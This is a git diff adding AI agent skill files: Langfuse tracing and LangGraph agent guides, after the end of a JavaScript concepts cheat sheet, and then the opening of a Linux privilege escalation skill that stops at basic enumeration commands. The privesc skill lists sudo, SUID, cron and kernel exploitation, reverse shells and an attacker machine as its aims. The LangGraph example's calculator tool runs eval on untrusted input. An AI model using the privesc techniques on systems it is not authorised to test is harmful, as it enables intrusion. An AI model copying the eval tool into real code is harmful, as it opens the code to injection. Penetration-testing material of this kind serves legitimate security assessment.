console.log("Hi!");
|
||||
}
|
||||
|
||||
// Function expressions don't hoist
|
||||
sayBye(); // TypeError
|
||||
var sayBye = function () {
|
||||
console.log("Bye!");
|
||||
};
|
||||
```
|
||||
|
||||
### 3.3 this Keyword
|
||||
|
||||
```javascript
|
||||
// Global context
|
||||
console.log(this); // window (browser) or global (Node)
|
||||
|
||||
// Object method
|
||||
const obj = {
|
||||
name: "Alice",
|
||||
greet() {
|
||||
console.log(this.name); // "Alice"
|
||||
},
|
||||
};
|
||||
|
||||
// Arrow functions (lexical this)
|
||||
const obj2 = {
|
||||
name: "Bob",
|
||||
greet: () => {
|
||||
console.log(this.name); // undefined (inherits outer this)
|
||||
},
|
||||
};
|
||||
|
||||
// Explicit binding
|
||||
function greet() {
|
||||
console.log(this.name);
|
||||
}
|
||||
greet.call({ name: "Charlie" }); // "Charlie"
|
||||
greet.apply({ name: "Diana" }); // "Diana"
|
||||
const bound = greet.bind({ name: "Eve" });
|
||||
bound(); // "Eve"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Event Loop & Async
|
||||
|
||||
### 4.1 Event Loop
|
||||
|
||||
```javascript
|
||||
console.log("1");
|
||||
|
||||
setTimeout(() => console.log("2"), 0);
|
||||
|
||||
Promise.resolve().then(() => console.log("3"));
|
||||
|
||||
console.log("4");
|
||||
|
||||
// Output: 1, 4, 3, 2
|
||||
// Why? Microtasks (Promises) run before macrotasks (setTimeout)
|
||||
```
|
||||
|
||||
**Execution order**:
|
||||
|
||||
1. Synchronous code (call stack)
|
||||
2. Microtasks (Promise callbacks, queueMicrotask)
|
||||
3. Macrotasks (setTimeout, setInterval, I/O)
|
||||
|
||||
### 4.2 Callbacks
|
||||
|
||||
```javascript
|
||||
// Callback pattern
|
||||
function fetchData(callback) {
|
||||
setTimeout(() => {
|
||||
callback(null, { data: "result" });
|
||||
}, 1000);
|
||||
}
|
||||
|
||||
// Error-first convention
|
||||
fetchData((error, result) => {
|
||||
if (error) {
|
||||
console.error(error);
|
||||
return;
|
||||
}
|
||||
console.log(result);
|
||||
});
|
||||
|
||||
// Callback hell (avoid this!)
|
||||
getData((data) => {
|
||||
processData(data, (processed) => {
|
||||
saveData(processed, (saved) => {
|
||||
notify(saved, () => {
|
||||
// 😱 Pyramid of doom
|
||||
});
|
||||
});
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 4.3 Promises
|
||||
|
||||
```javascript
|
||||
// Creating a Promise
|
||||
const promise = new Promise((resolve, reject) => {
|
||||
setTimeout(() => {
|
||||
resolve("Success!");
|
||||
// or: reject(new Error("Failed!"));
|
||||
}, 1000);
|
||||
});
|
||||
|
||||
// Consuming Promises
|
||||
promise
|
||||
.then((result) => console.log(result))
|
||||
.catch((error) => console.error(error))
|
||||
.finally(() => console.log("Done"));
|
||||
|
||||
// Promise combinators
|
||||
Promise.all([p1, p2, p3]); // All must succeed
|
||||
Promise.allSettled([p1, p2]); // Wait for all, get status
|
||||
Promise.race([p1, p2]); // First to settle
|
||||
Promise.any([p1, p2]); // First to succeed
|
||||
```
|
||||
|
||||
### 4.4 async/await
|
||||
|
||||
```javascript
|
||||
async function fetchUserData(userId) {
|
||||
try {
|
||||
const response = await fetch(`/api/users/${userId}`);
|
||||
if (!response.ok) throw new Error("Failed to fetch");
|
||||
const user = await response.json();
|
||||
return user;
|
||||
} catch (error) {
|
||||
console.error("Error:", error);
|
||||
throw error; // Re-throw for caller to handle
|
||||
}
|
||||
}
|
||||
|
||||
// Parallel execution
|
||||
async function fetchAll() {
|
||||
const [users, posts] = await Promise.all([
|
||||
fetch("/api/users"),
|
||||
fetch("/api/posts"),
|
||||
]);
|
||||
return { users, posts };
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Functional Programming
|
||||
|
||||
### 5.1 Higher-Order Functions
|
||||
|
||||
Functions that take or return functions:
|
||||
|
||||
```javascript
|
||||
// Takes a function
|
||||
const numbers = [1, 2, 3];
|
||||
const doubled = numbers.map((n) => n * 2); // [2, 4, 6]
|
||||
|
||||
// Returns a function
|
||||
function multiply(a) {
|
||||
return function (b) {
|
||||
return a * b;
|
||||
};
|
||||
}
|
||||
const double = multiply(2);
|
||||
double(5); // 10
|
||||
```
|
||||
|
||||
### 5.2 Pure Functions
|
||||
|
||||
```javascript
|
||||
// Pure: same input → same output, no side effects
|
||||
function add(a, b) {
|
||||
return a + b;
|
||||
}
|
||||
|
||||
// Impure: modifies external state
|
||||
let total = 0;
|
||||
function addToTotal(value) {
|
||||
total += value; // Side effect!
|
||||
return total;
|
||||
}
|
||||
|
||||
// Impure: depends on external state
|
||||
function getDiscount(price) {
|
||||
return price * globalDiscountRate; // External dependency
|
||||
}
|
||||
```
|
||||
|
||||
### 5.3 map, filter, reduce
|
||||
|
||||
```javascript
|
||||
const users = [
|
||||
{ name: "Alice", age: 25 },
|
||||
{ name: "Bob", age: 30 },
|
||||
{ name: "Charlie", age: 35 },
|
||||
];
|
||||
|
||||
// map: transform each element
|
||||
const names = users.map((u) => u.name);
|
||||
// ["Alice", "Bob", "Charlie"]
|
||||
|
||||
// filter: keep elements matching condition
|
||||
const adults = users.filter((u) => u.age >= 30);
|
||||
// [{ name: "Bob", ... }, { name: "Charlie", ... }]
|
||||
|
||||
// reduce: accumulate into single value
|
||||
const totalAge = users.reduce((sum, u) => sum + u.age, 0);
|
||||
// 90
|
||||
|
||||
// Chaining
|
||||
const result = users
|
||||
.filter((u) => u.age >= 30)
|
||||
.map((u) => u.name)
|
||||
.join(", ");
|
||||
// "Bob, Charlie"
|
||||
```
|
||||
|
||||
### 5.4 Currying & Composition
|
||||
|
||||
```javascript
|
||||
// Currying: transform f(a, b, c) into f(a)(b)(c)
|
||||
const curry = (fn) => {
|
||||
return function curried(...args) {
|
||||
if (args.length >= fn.length) {
|
||||
return fn.apply(this, args);
|
||||
}
|
||||
return (...moreArgs) => curried(...args, ...moreArgs);
|
||||
};
|
||||
};
|
||||
|
||||
const add = curry((a, b, c) => a + b + c);
|
||||
add(1)(2)(3); // 6
|
||||
add(1, 2)(3); // 6
|
||||
add(1)(2, 3); // 6
|
||||
|
||||
// Composition: combine functions
|
||||
const compose =
|
||||
(...fns) =>
|
||||
(x) =>
|
||||
fns.reduceRight((acc, fn) => fn(acc), x);
|
||||
|
||||
const pipe =
|
||||
(...fns) =>
|
||||
(x) =>
|
||||
fns.reduce((acc, fn) => fn(acc), x);
|
||||
|
||||
const addOne = (x) => x + 1;
|
||||
const double = (x) => x * 2;
|
||||
|
||||
const addThenDouble = compose(double, addOne);
|
||||
addThenDouble(5); // 12 = (5 + 1) * 2
|
||||
|
||||
const doubleThenAdd = pipe(double, addOne);
|
||||
doubleThenAdd(5); // 11 = (5 * 2) + 1
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Objects & Prototypes
|
||||
|
||||
### 6.1 Prototypal Inheritance
|
||||
|
||||
```javascript
|
||||
// Prototype chain
|
||||
const animal = {
|
||||
speak() {
|
||||
console.log("Some sound");
|
||||
},
|
||||
};
|
||||
|
||||
const dog = Object.create(animal);
|
||||
dog.bark = function () {
|
||||
console.log("Woof!");
|
||||
};
|
||||
|
||||
dog.speak(); // "Some sound" (inherited)
|
||||
dog.bark(); // "Woof!" (own method)
|
||||
|
||||
// ES6 Classes (syntactic sugar)
|
||||
class Animal {
|
||||
speak() {
|
||||
console.log("Some sound");
|
||||
}
|
||||
}
|
||||
|
||||
class Dog extends Animal {
|
||||
bark() {
|
||||
console.log("Woof!");
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 6.2 Object Methods
|
||||
|
||||
```javascript
|
||||
const obj = { a: 1, b: 2 };
|
||||
|
||||
// Keys, values, entries
|
||||
Object.keys(obj); // ["a", "b"]
|
||||
Object.values(obj); // [1, 2]
|
||||
Object.entries(obj); // [["a", 1], ["b", 2]]
|
||||
|
||||
// Shallow copy
|
||||
const copy = { ...obj };
|
||||
const copy2 = Object.assign({}, obj);
|
||||
|
||||
// Freeze (immutable)
|
||||
const frozen = Object.freeze({ x: 1 });
|
||||
frozen.x = 2; // Silently fails (or throws in strict mode)
|
||||
|
||||
// Seal (no add/delete, can modify)
|
||||
const sealed = Object.seal({ x: 1 });
|
||||
sealed.x = 2; // OK
|
||||
sealed.y = 3; // Fails
|
||||
delete sealed.x; // Fails
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 7. Modern JavaScript (ES6+)
|
||||
|
||||
### 7.1 Destructuring
|
||||
|
||||
```javascript
|
||||
// Array destructuring
|
||||
const [first, second, ...rest] = [1, 2, 3, 4, 5];
|
||||
// first = 1, second = 2, rest = [3, 4, 5]
|
||||
|
||||
// Object destructuring
|
||||
const { name, age, city = "Unknown" } = { name: "Alice", age: 25 };
|
||||
// name = "Alice", age = 25, city = "Unknown"
|
||||
|
||||
// Renaming
|
||||
const { name: userName } = { name: "Bob" };
|
||||
// userName = "Bob"
|
||||
|
||||
// Nested
|
||||
const {
|
||||
address: { street },
|
||||
} = { address: { street: "123 Main" } };
|
||||
```
|
||||
|
||||
### 7.2 Spread & Rest
|
||||
|
||||
```javascript
|
||||
// Spread: expand iterable
|
||||
const arr1 = [1, 2, 3];
|
||||
const arr2 = [...arr1, 4, 5]; // [1, 2, 3, 4, 5]
|
||||
|
||||
const obj1 = { a: 1 };
|
||||
const obj2 = { ...obj1, b: 2 }; // { a: 1, b: 2 }
|
||||
|
||||
// Rest: collect remaining
|
||||
function sum(...numbers) {
|
||||
return numbers.reduce((a, b) => a + b, 0);
|
||||
}
|
||||
sum(1, 2, 3, 4); // 10
|
||||
```
|
||||
|
||||
### 7.3 Modules
|
||||
|
||||
```javascript
|
||||
// Named exports
|
||||
export const PI = 3.14159;
|
||||
export function square(x) {
|
||||
return x * x;
|
||||
}
|
||||
|
||||
// Default export
|
||||
export default class Calculator {}
|
||||
|
||||
// Importing
|
||||
import Calculator, { PI, square } from "./math.js";
|
||||
import * as math from "./math.js";
|
||||
|
||||
// Dynamic import
|
||||
const module = await import("./dynamic.js");
|
||||
```
|
||||
|
||||
### 7.4 Optional Chaining & Nullish Coalescing
|
||||
|
||||
```javascript
|
||||
// Optional chaining (?.)
|
||||
const user = { address: { city: "NYC" } };
|
||||
const city = user?.address?.city; // "NYC"
|
||||
const zip = user?.address?.zip; // undefined (no error)
|
||||
const fn = user?.getName?.(); // undefined if no method
|
||||
|
||||
// Nullish coalescing (??)
|
||||
const value = null ?? "default"; // "default"
|
||||
const zero = 0 ?? "default"; // 0 (not nullish!)
|
||||
const empty = "" ?? "default"; // "" (not nullish!)
|
||||
|
||||
// Compare with ||
|
||||
const value2 = 0 || "default"; // "default" (0 is falsy)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference Card
|
||||
|
||||
| Concept | Key Point |
|
||||
| :------------- | :-------------------------------- |
|
||||
| `==` vs `===` | Always use `===` |
|
||||
| `var` vs `let` | Prefer `let`/`const` |
|
||||
| Closures | Function + lexical scope |
|
||||
| `this` | Depends on how function is called |
|
||||
| Event loop | Microtasks before macrotasks |
|
||||
| Pure functions | Same input → same output |
|
||||
| Prototypes | `__proto__` → prototype chain |
|
||||
| `??` vs `\|\|` | `??` only checks null/undefined |
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [33 JS Concepts](https://github.com/leonardomso/33-js-concepts)
|
||||
- [JavaScript.info](https://javascript.info/)
|
||||
- [MDN JavaScript Guide](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide)
|
||||
- [You Don't Know JS](https://github.com/getify/You-Dont-Know-JS)
|
||||
238
skills/langfuse/SKILL.md
Normal file
238
skills/langfuse/SKILL.md
Normal file
@@ -0,0 +1,238 @@
|
||||
---
|
||||
name: langfuse
|
||||
description: "Expert in Langfuse - the open-source LLM observability platform. Covers tracing, prompt management, evaluation, datasets, and integration with LangChain, LlamaIndex, and OpenAI. Essential for debugging, monitoring, and improving LLM applications in production. Use when: langfuse, llm observability, llm tracing, prompt management, llm evaluation."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Langfuse
|
||||
|
||||
**Role**: LLM Observability Architect
|
||||
|
||||
You are an expert in LLM observability and evaluation. You think in terms of
|
||||
traces, spans, and metrics. You know that LLM applications need monitoring
|
||||
just like traditional software - but with different dimensions (cost, quality,
|
||||
latency). You use data to drive prompt improvements and catch regressions.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- LLM tracing and observability
|
||||
- Prompt management and versioning
|
||||
- Evaluation and scoring
|
||||
- Dataset management
|
||||
- Cost tracking
|
||||
- Performance monitoring
|
||||
- A/B testing prompts
|
||||
|
||||
## Requirements
|
||||
|
||||
- Python or TypeScript/JavaScript
|
||||
- Langfuse account (cloud or self-hosted)
|
||||
- LLM API keys
|
||||
|
||||
## Patterns
|
||||
|
||||
### Basic Tracing Setup
|
||||
|
||||
Instrument LLM calls with Langfuse
|
||||
|
||||
**When to use**: Any LLM application
|
||||
|
||||
```python
|
||||
from langfuse import Langfuse
|
||||
|
||||
# Initialize client
|
||||
langfuse = Langfuse(
|
||||
public_key="pk-...",
|
||||
secret_key="sk-...",
|
||||
host="https://cloud.langfuse.com" # or self-hosted URL
|
||||
)
|
||||
|
||||
# Create a trace for a user request
|
||||
trace = langfuse.trace(
|
||||
name="chat-completion",
|
||||
user_id="user-123",
|
||||
session_id="session-456", # Groups related traces
|
||||
metadata={"feature": "customer-support"},
|
||||
tags=["production", "v2"]
|
||||
)
|
||||
|
||||
# Log a generation (LLM call)
|
||||
generation = trace.generation(
|
||||
name="gpt-4o-response",
|
||||
model="gpt-4o",
|
||||
model_parameters={"temperature": 0.7},
|
||||
input={"messages": [{"role": "user", "content": "Hello"}]},
|
||||
metadata={"attempt": 1}
|
||||
)
|
||||
|
||||
# Make actual LLM call
|
||||
response = openai.chat.completions.create(
|
||||
model="gpt-4o",
|
||||
messages=[{"role": "user", "content": "Hello"}]
|
||||
)
|
||||
|
||||
# Complete the generation with output
|
||||
generation.end(
|
||||
output=response.choices[0].message.content,
|
||||
usage={
|
||||
"input": response.usage.prompt_tokens,
|
||||
"output": response.usage.completion_tokens
|
||||
}
|
||||
)
|
||||
|
||||
# Score the trace
|
||||
trace.score(
|
||||
name="user-feedback",
|
||||
value=1, # 1 = positive, 0 = negative
|
||||
comment="User clicked helpful"
|
||||
)
|
||||
|
||||
# Flush before exit (important in serverless)
|
||||
langfuse.flush()
|
||||
```
|
||||
|
||||
### OpenAI Integration
|
||||
|
||||
Automatic tracing with OpenAI SDK
|
||||
|
||||
**When to use**: OpenAI-based applications
|
||||
|
||||
```python
|
||||
from langfuse.openai import openai
|
||||
|
||||
# Drop-in replacement for OpenAI client
|
||||
# All calls automatically traced
|
||||
|
||||
response = openai.chat.completions.create(
|
||||
model="gpt-4o",
|
||||
messages=[{"role": "user", "content": "Hello"}],
|
||||
# Langfuse-specific parameters
|
||||
name="greeting", # Trace name
|
||||
session_id="session-123",
|
||||
user_id="user-456",
|
||||
tags=["test"],
|
||||
metadata={"feature": "chat"}
|
||||
)
|
||||
|
||||
# Works with streaming
|
||||
stream = openai.chat.completions.create(
|
||||
model="gpt-4o",
|
||||
messages=[{"role": "user", "content": "Tell me a story"}],
|
||||
stream=True,
|
||||
name="story-generation"
|
||||
)
|
||||
|
||||
for chunk in stream:
|
||||
print(chunk.choices[0].delta.content, end="")
|
||||
|
||||
# Works with async
|
||||
import asyncio
|
||||
from langfuse.openai import AsyncOpenAI
|
||||
|
||||
async_client = AsyncOpenAI()
|
||||
|
||||
async def main():
|
||||
response = await async_client.chat.completions.create(
|
||||
model="gpt-4o",
|
||||
messages=[{"role": "user", "content": "Hello"}],
|
||||
name="async-greeting"
|
||||
)
|
||||
```
|
||||
|
||||
### LangChain Integration
|
||||
|
||||
Trace LangChain applications
|
||||
|
||||
**When to use**: LangChain-based applications
|
||||
|
||||
```python
|
||||
from langchain_openai import ChatOpenAI
|
||||
from langchain_core.prompts import ChatPromptTemplate
|
||||
from langfuse.callback import CallbackHandler
|
||||
|
||||
# Create Langfuse callback handler
|
||||
langfuse_handler = CallbackHandler(
|
||||
public_key="pk-...",
|
||||
secret_key="sk-...",
|
||||
host="https://cloud.langfuse.com",
|
||||
session_id="session-123",
|
||||
user_id="user-456"
|
||||
)
|
||||
|
||||
# Use with any LangChain component
|
||||
llm = ChatOpenAI(model="gpt-4o")
|
||||
|
||||
prompt = ChatPromptTemplate.from_messages([
|
||||
("system", "You are a helpful assistant."),
|
||||
("user", "{input}")
|
||||
])
|
||||
|
||||
chain = prompt | llm
|
||||
|
||||
# Pass handler to invoke
|
||||
response = chain.invoke(
|
||||
{"input": "Hello"},
|
||||
config={"callbacks": [langfuse_handler]}
|
||||
)
|
||||
|
||||
# Or set as default
|
||||
import langchain
|
||||
langchain.callbacks.manager.set_handler(langfuse_handler)
|
||||
|
||||
# Then all calls are traced
|
||||
response = chain.invoke({"input": "Hello"})
|
||||
|
||||
# Works with agents, retrievers, etc.
|
||||
from langchain.agents import create_openai_tools_agent
|
||||
|
||||
agent = create_openai_tools_agent(llm, tools, prompt)
|
||||
agent_executor = AgentExecutor(agent=agent, tools=tools)
|
||||
|
||||
result = agent_executor.invoke(
|
||||
{"input": "What's the weather?"},
|
||||
config={"callbacks": [langfuse_handler]}
|
||||
)
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Not Flushing in Serverless
|
||||
|
||||
**Why bad**: Traces are batched.
|
||||
Serverless may exit before flush.
|
||||
Data is lost.
|
||||
|
||||
**Instead**: Always call langfuse.flush() at end.
|
||||
Use context managers where available.
|
||||
Consider sync mode for critical traces.
|
||||
|
||||
### ❌ Tracing Everything
|
||||
|
||||
**Why bad**: Noisy traces.
|
||||
Performance overhead.
|
||||
Hard to find important info.
|
||||
|
||||
**Instead**: Focus on: LLM calls, key logic, user actions.
|
||||
Group related operations.
|
||||
Use meaningful span names.
|
||||
|
||||
### ❌ No User/Session IDs
|
||||
|
||||
**Why bad**: Can't debug specific users.
|
||||
Can't track sessions.
|
||||
Analytics limited.
|
||||
|
||||
**Instead**: Always pass user_id and session_id.
|
||||
Use consistent identifiers.
|
||||
Add relevant metadata.
|
||||
|
||||
## Limitations
|
||||
|
||||
- Self-hosted requires infrastructure
|
||||
- High-volume may need optimization
|
||||
- Real-time dashboard has latency
|
||||
- Evaluation requires setup
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `langgraph`, `crewai`, `structured-output`, `autonomous-agents`
|
||||
287
skills/langgraph/SKILL.md
Normal file
287
skills/langgraph/SKILL.md
Normal file
@@ -0,0 +1,287 @@
|
||||
---
|
||||
name: langgraph
|
||||
description: "Expert in LangGraph - the production-grade framework for building stateful, multi-actor AI applications. Covers graph construction, state management, cycles and branches, persistence with checkpointers, human-in-the-loop patterns, and the ReAct agent pattern. Used in production at LinkedIn, Uber, and 400+ companies. This is LangChain's recommended approach for building agents. Use when: langgraph, langchain agent, stateful agent, agent graph, react agent."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# LangGraph
|
||||
|
||||
**Role**: LangGraph Agent Architect
|
||||
|
||||
You are an expert in building production-grade AI agents with LangGraph. You
|
||||
understand that agents need explicit structure - graphs make the flow visible
|
||||
and debuggable. You design state carefully, use reducers appropriately, and
|
||||
always consider persistence for production. You know when cycles are needed
|
||||
and how to prevent infinite loops.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Graph construction (StateGraph)
|
||||
- State management and reducers
|
||||
- Node and edge definitions
|
||||
- Conditional routing
|
||||
- Checkpointers and persistence
|
||||
- Human-in-the-loop patterns
|
||||
- Tool integration
|
||||
- Streaming and async execution
|
||||
|
||||
## Requirements
|
||||
|
||||
- Python 3.9+
|
||||
- langgraph package
|
||||
- LLM API access (OpenAI, Anthropic, etc.)
|
||||
- Understanding of graph concepts
|
||||
|
||||
## Patterns
|
||||
|
||||
### Basic Agent Graph
|
||||
|
||||
Simple ReAct-style agent with tools
|
||||
|
||||
**When to use**: Single agent with tool calling
|
||||
|
||||
```python
|
||||
from typing import Annotated, TypedDict
|
||||
from langgraph.graph import StateGraph, START, END
|
||||
from langgraph.graph.message import add_messages
|
||||
from langgraph.prebuilt import ToolNode
|
||||
from langchain_openai import ChatOpenAI
|
||||
from langchain_core.tools import tool
|
||||
|
||||
# 1. Define State
|
||||
class AgentState(TypedDict):
|
||||
messages: Annotated[list, add_messages]
|
||||
# add_messages reducer appends, doesn't overwrite
|
||||
|
||||
# 2. Define Tools
|
||||
@tool
|
||||
def search(query: str) -> str:
|
||||
"""Search the web for information."""
|
||||
# Implementation here
|
||||
return f"Results for: {query}"
|
||||
|
||||
@tool
|
||||
def calculator(expression: str) -> str:
|
||||
"""Evaluate a math expression."""
|
||||
return str(eval(expression))
|
||||
|
||||
tools = [search, calculator]
|
||||
|
||||
# 3. Create LLM with tools
|
||||
llm = ChatOpenAI(model="gpt-4o").bind_tools(tools)
|
||||
|
||||
# 4. Define Nodes
|
||||
def agent(state: AgentState) -> dict:
|
||||
"""The agent node - calls LLM."""
|
||||
response = llm.invoke(state["messages"])
|
||||
return {"messages": [response]}
|
||||
|
||||
# Tool node handles tool execution
|
||||
tool_node = ToolNode(tools)
|
||||
|
||||
# 5. Define Routing
|
||||
def should_continue(state: AgentState) -> str:
|
||||
"""Route based on whether tools were called."""
|
||||
last_message = state["messages"][-1]
|
||||
if last_message.tool_calls:
|
||||
return "tools"
|
||||
return END
|
||||
|
||||
# 6. Build Graph
|
||||
graph = StateGraph(AgentState)
|
||||
|
||||
# Add nodes
|
||||
graph.add_node("agent", agent)
|
||||
graph.add_node("tools", tool_node)
|
||||
|
||||
# Add edges
|
||||
graph.add_edge(START, "agent")
|
||||
graph.add_conditional_edges("agent", should_continue, ["tools", END])
|
||||
graph.add_edge("tools", "agent") # Loop back
|
||||
|
||||
# Compile
|
||||
app = graph.compile()
|
||||
|
||||
# 7. Run
|
||||
result = app.invoke({
|
||||
"messages": [("user", "What is 25 * 4?")]
|
||||
})
|
||||
```
|
||||
|
||||
### State with Reducers
|
||||
|
||||
Complex state management with custom reducers
|
||||
|
||||
**When to use**: Multiple agents updating shared state
|
||||
|
||||
```python
|
||||
from typing import Annotated, TypedDict
|
||||
from operator import add
|
||||
from langgraph.graph import StateGraph
|
||||
|
||||
# Custom reducer for merging dictionaries
|
||||
def merge_dicts(left: dict, right: dict) -> dict:
|
||||
return {**left, **right}
|
||||
|
||||
# State with multiple reducers
|
||||
class ResearchState(TypedDict):
|
||||
# Messages append (don't overwrite)
|
||||
messages: Annotated[list, add_messages]
|
||||
|
||||
# Research findings merge
|
||||
findings: Annotated[dict, merge_dicts]
|
||||
|
||||
# Sources accumulate
|
||||
sources: Annotated[list[str], add]
|
||||
|
||||
# Current step (overwrites - no reducer)
|
||||
current_step: str
|
||||
|
||||
# Error count (custom reducer)
|
||||
errors: Annotated[int, lambda a, b: a + b]
|
||||
|
||||
# Nodes return partial state updates
|
||||
def researcher(state: ResearchState) -> dict:
|
||||
# Only return fields being updated
|
||||
return {
|
||||
"findings": {"topic_a": "New finding"},
|
||||
"sources": ["source1.com"],
|
||||
"current_step": "researching"
|
||||
}
|
||||
|
||||
def writer(state: ResearchState) -> dict:
|
||||
# Access accumulated state
|
||||
all_findings = state["findings"]
|
||||
all_sources = state["sources"]
|
||||
|
||||
return {
|
||||
"messages": [("assistant", f"Report based on {len(all_sources)} sources")],
|
||||
"current_step": "writing"
|
||||
}
|
||||
|
||||
# Build graph
|
||||
graph = StateGraph(ResearchState)
|
||||
graph.add_node("researcher", researcher)
|
||||
graph.add_node("writer", writer)
|
||||
# ... add edges
|
||||
```
|
||||
|
||||
### Conditional Branching
|
||||
|
||||
Route to different paths based on state
|
||||
|
||||
**When to use**: Multiple possible workflows
|
||||
|
||||
```python
|
||||
from langgraph.graph import StateGraph, START, END
|
||||
|
||||
class RouterState(TypedDict):
|
||||
query: str
|
||||
query_type: str
|
||||
result: str
|
||||
|
||||
def classifier(state: RouterState) -> dict:
|
||||
"""Classify the query type."""
|
||||
query = state["query"].lower()
|
||||
if "code" in query or "program" in query:
|
||||
return {"query_type": "coding"}
|
||||
elif "search" in query or "find" in query:
|
||||
return {"query_type": "search"}
|
||||
else:
|
||||
return {"query_type": "chat"}
|
||||
|
||||
def coding_agent(state: RouterState) -> dict:
|
||||
return {"result": "Here's your code..."}
|
||||
|
||||
def search_agent(state: RouterState) -> dict:
|
||||
return {"result": "Search results..."}
|
||||
|
||||
def chat_agent(state: RouterState) -> dict:
|
||||
return {"result": "Let me help..."}
|
||||
|
||||
# Routing function
|
||||
def route_query(state: RouterState) -> str:
|
||||
"""Route to appropriate agent."""
|
||||
query_type = state["query_type"]
|
||||
return query_type # Returns node name
|
||||
|
||||
# Build graph
|
||||
graph = StateGraph(RouterState)
|
||||
|
||||
graph.add_node("classifier", classifier)
|
||||
graph.add_node("coding", coding_agent)
|
||||
graph.add_node("search", search_agent)
|
||||
graph.add_node("chat", chat_agent)
|
||||
|
||||
graph.add_edge(START, "classifier")
|
||||
|
||||
# Conditional edges from classifier
|
||||
graph.add_conditional_edges(
|
||||
"classifier",
|
||||
route_query,
|
||||
{
|
||||
"coding": "coding",
|
||||
"search": "search",
|
||||
"chat": "chat"
|
||||
}
|
||||
)
|
||||
|
||||
# All agents lead to END
|
||||
graph.add_edge("coding", END)
|
||||
graph.add_edge("search", END)
|
||||
graph.add_edge("chat", END)
|
||||
|
||||
app = graph.compile()
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Infinite Loop Without Exit
|
||||
|
||||
**Why bad**: Agent loops forever.
|
||||
Burns tokens and costs.
|
||||
Eventually errors out.
|
||||
|
||||
**Instead**: Always have exit conditions:
|
||||
- Max iterations counter in state
|
||||
- Clear END conditions in routing
|
||||
- Timeout at application level
|
||||
|
||||
def should_continue(state):
|
||||
if state["iterations"] > 10:
|
||||
return END
|
||||
if state["task_complete"]:
|
||||
return END
|
||||
return "agent"
|
||||
|
||||
### ❌ Stateless Nodes
|
||||
|
||||
**Why bad**: Loses LangGraph's benefits.
|
||||
State not persisted.
|
||||
Can't resume conversations.
|
||||
|
||||
**Instead**: Always use state for data flow.
|
||||
Return state updates from nodes.
|
||||
Use reducers for accumulation.
|
||||
Let LangGraph manage state.
|
||||
|
||||
### ❌ Giant Monolithic State
|
||||
|
||||
**Why bad**: Hard to reason about.
|
||||
Unnecessary data in context.
|
||||
Serialization overhead.
|
||||
|
||||
**Instead**: Use input/output schemas for clean interfaces.
|
||||
Private state for internal data.
|
||||
Clear separation of concerns.
|
||||
|
||||
## Limitations
|
||||
|
||||
- Python-only (TypeScript in early stages)
|
||||
- Learning curve for graph concepts
|
||||
- State management complexity
|
||||
- Debugging can be challenging
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `crewai`, `autonomous-agents`, `langfuse`, `structured-output`
|
||||
501
skills/linux-privilege-escalation/SKILL.md
Normal file
501
skills/linux-privilege-escalation/SKILL.md
Normal file
@@ -0,0 +1,501 @@
|
||||
---
|
||||
name: Linux Privilege Escalation
|
||||
description: This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". It provides comprehensive techniques for identifying and exploiting privilege escalation paths on Linux systems.
|
||||
---
|
||||
|
||||
# Linux Privilege Escalation
|
||||
|
||||
## Purpose
|
||||
|
||||
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.
|
||||
|
||||
## Inputs / Prerequisites
|
||||
|
||||
### Required Access
|
||||
- Low-privilege shell access to target Linux system
|
||||
- Ability to execute commands (interactive or semi-interactive shell)
|
||||
- Network access for reverse shell connections (if needed)
|
||||
- Attacker machine for payload hosting and receiving shells
|
||||
|
||||
### Technical Requirements
|
||||
- Understanding of Linux filesystem permissions and ownership
|
||||
- Familiarity with common Linux utilities and scripting
|
||||
- Knowledge of kernel versions and associated vulnerabilities
|
||||
- Basic understanding of compilation (gcc) for custom exploits
|
||||
|
||||
### Recommended Tools
|
||||
- LinPEAS, LinEnum, or Linux Smart Enumeration scripts
|
||||
- Linux Exploit Suggester (LES)
|
||||
- GTFOBins reference for binary exploitation
|
||||
- John the Ripper or Hashcat for password cracking
|
||||
- Netcat or similar for reverse shells
|
||||
|
||||
## Outputs / Deliverables
|
||||
|
||||
### Primary Outputs
|
||||
- Root shell access on target system
|
||||
- Privilege escalation path documentation
|
||||
- System enumeration findings report
|
||||
- Recommendations for remediation
|
||||
|
||||
### Evidence Artifacts
|
||||
- Screenshots of successful privilege escalation
|
||||
- Command output logs demonstrating root access
|
||||
- Identified vulnerability details
|
||||
- Exploited configuration files
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: System Enumeration
|
||||
|
||||
#### Basic System Information
|
||||
Gather fundamental system details for vulnerability research:
|
||||
|
||||
```bash
|
||||
# Hostname and system role
|
||||
hostname
|
||||
|
||||
# Kernel version and architecture
|
||||
uname -a
|
||||
|
||||
# Detailed kernel information
|
||||
cat /proc/version
|
||||
|
||||
# Operating system details
|
||||
cat /etc/issue
|
||||
cat /etc/*-release
|
||||
|
||||
# Architecture
|
||||
arch
|
||||
```
|
||||
|
||||
#### User and Permission Enumeration
|
||||
|
||||
```bash
|
||||
# Current user context
|
||||
whoami
|
||||
id
